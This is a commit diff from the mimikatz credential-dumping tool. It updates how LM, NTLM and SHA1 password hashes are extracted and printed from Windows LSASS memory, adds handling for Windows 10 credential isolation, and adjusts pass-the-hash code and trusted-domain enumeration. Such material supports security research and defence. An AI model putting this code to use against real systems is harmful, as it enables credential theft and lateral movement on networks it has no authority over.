lsadump decrypt fix, LSA Iso for Win10

dptechma · May 2, 2015 · 723f6d9 · 723f6d9
1 parent e3914fe
commit 723f6d9
Show file tree

Hide file tree

Showing 4 changed files with 26 additions and 26 deletions.
diff --git a/mimikatz/modules/kuhl_m_lsadump.c b/mimikatz/modules/kuhl_m_lsadump.c
@@ -1490,7 +1490,7 @@ NTSTATUS kuhl_m_lsadump_trust(int argc, wchar_t * argv[])
 
 				for(
 					hLSAEnum = 0, statusEnum = LsaEnumerateTrustedDomainsEx(hLSA, &hLSAEnum, (PVOID *) &domainInfoEx, 0, &returned);
-					(statusEnum == STATUS_SUCCESS) || (statusEnum == STATUS_MORE_ENTRIES);
+					returned && ((statusEnum == STATUS_SUCCESS) || (statusEnum == STATUS_MORE_ENTRIES));
 				statusEnum = LsaEnumerateTrustedDomainsEx(hLSA, &hLSAEnum, (PVOID *) &domainInfoEx, 0, &returned)
 					)
 				{
@@ -1515,7 +1515,7 @@ NTSTATUS kuhl_m_lsadump_trust(int argc, wchar_t * argv[])
 					}
 					LsaFreeMemory(domainInfoEx);
 				}
-				if(statusEnum != STATUS_NO_MORE_ENTRIES)
+				if((statusEnum != STATUS_NO_MORE_ENTRIES) && (statusEnum != STATUS_SUCCESS))
 					PRINT_ERROR(L"LsaEnumerateTrustedDomainsEx %08x\n", statusEnum);
 
 				LsaFreeMemory(pDomainInfo);

diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
@@ -779,29 +779,30 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
 					kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->LogonDomainName, FALSE);
 
 					kprintf(L"\n\t * Username : %wZ\n\t * Domain   : %wZ", &pPrimaryCreds10->UserName, &pPrimaryCreds10->LogonDomainName);
-					kprintf(L"\n\t * Flags    : %02x/N%02x/L%02x/S%02x/%02x/%02x", pPrimaryCreds10->isUnk0, pPrimaryCreds10->isNtOwfPassword, pPrimaryCreds10->isLmOwfPassword, pPrimaryCreds10->isShaOwPassword, pPrimaryCreds10->isUnk1, pPrimaryCreds10->isUnk2);
-					if(pPrimaryCreds10->isLmOwfPassword)
+					kprintf(L"\n\t * Flags    : I%02x/N%02x/L%02x/S%02x", pPrimaryCreds10->isIso, pPrimaryCreds10->isNtOwfPassword, pPrimaryCreds10->isLmOwfPassword, pPrimaryCreds10->isShaOwPassword);
+					if(!pPrimaryCreds10->isIso)
 					{
-						kprintf(L"\n\t * LM       : ");
-						kull_m_string_wprintf_hex(pPrimaryCreds10->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
-					}
-					if(pPrimaryCreds10->isNtOwfPassword)
-					{
-						kprintf(L"\n\t * NTLM     : ");
-						kull_m_string_wprintf_hex(pPrimaryCreds10->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
+						if(pPrimaryCreds10->isLmOwfPassword)
+						{
+							kprintf(L"\n\t * LM       : ");
+							kull_m_string_wprintf_hex(pPrimaryCreds10->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
+						}
+						if(pPrimaryCreds10->isNtOwfPassword)
+						{
+							kprintf(L"\n\t * NTLM     : ");
+							kull_m_string_wprintf_hex(pPrimaryCreds10->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
+						}
+						if(pPrimaryCreds10->isShaOwPassword)
+						{
+							kprintf(L"\n\t * SHA1     : ");
+							kull_m_string_wprintf_hex(pPrimaryCreds10->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
+						}
 					}
-					if(pPrimaryCreds10->isShaOwPassword)
+					else
 					{
-						kprintf(L"\n\t * SHA1     : ");
-						kull_m_string_wprintf_hex(pPrimaryCreds10->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
+						kprintf(L"\n\t * Isolation data :\n");
+						kull_m_string_wprintf_hex((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, align0), (DWORD) ((PBYTE) pPrimaryCreds10->LogonDomainName.Buffer - ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, align0))), 1 | (16 << 16)); 
 					}
-					kprintf(L"\n\t * unknow   : ");
-					for(i = 0; !isNull && (i < 128); i++)
-						isNull |= !pPrimaryCreds10->UnkStruct[i];
-					if(isNull)
-						kprintf(L"[0..0]");
-					else
-						kull_m_string_wprintf_hex(pPrimaryCreds10->UnkStruct, 128, 0);
 					break;
 				case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
 					pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;

diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c
@@ -77,9 +77,9 @@ BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKUHL_M_SEKURLSA_CON
 			}
 			RtlZeroMemory(pPrimaryCreds10->LmOwfPassword, LM_NTLM_HASH_LENGTH);
 			RtlZeroMemory(pPrimaryCreds10->ShaOwPassword, SHA_DIGEST_LENGTH);
+			pPrimaryCreds10->isIso = FALSE;
 			pPrimaryCreds10->isLmOwfPassword = FALSE;
 			pPrimaryCreds10->isShaOwPassword = FALSE;
-			RtlZeroMemory(pPrimaryCreds10->UnkStruct, 128);
 		}
 		(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(pCredentials->Credentials.Buffer, pCredentials->Credentials.Length);
 

diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.h b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.h
@@ -23,16 +23,15 @@ typedef struct _MSV1_0_PRIMARY_CREDENTIAL {
 typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 { 
 	LSA_UNICODE_STRING LogonDomainName; 
 	LSA_UNICODE_STRING UserName;
-	BOOLEAN isUnk0;
+	BOOLEAN isIso;
 	BOOLEAN isNtOwfPassword;
 	BOOLEAN isLmOwfPassword;
 	BOOLEAN isShaOwPassword;
-	BOOLEAN isUnk1;
-	BOOLEAN isUnk2;
+	BYTE align0;
+	BYTE align1;
 	BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH];
 	BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH];
 	BYTE ShaOwPassword[SHA_DIGEST_LENGTH];
-	BYTE UnkStruct[128];
 	/* buffer */
 } MSV1_0_PRIMARY_CREDENTIAL_10, *PMSV1_0_PRIMARY_CREDENTIAL_10;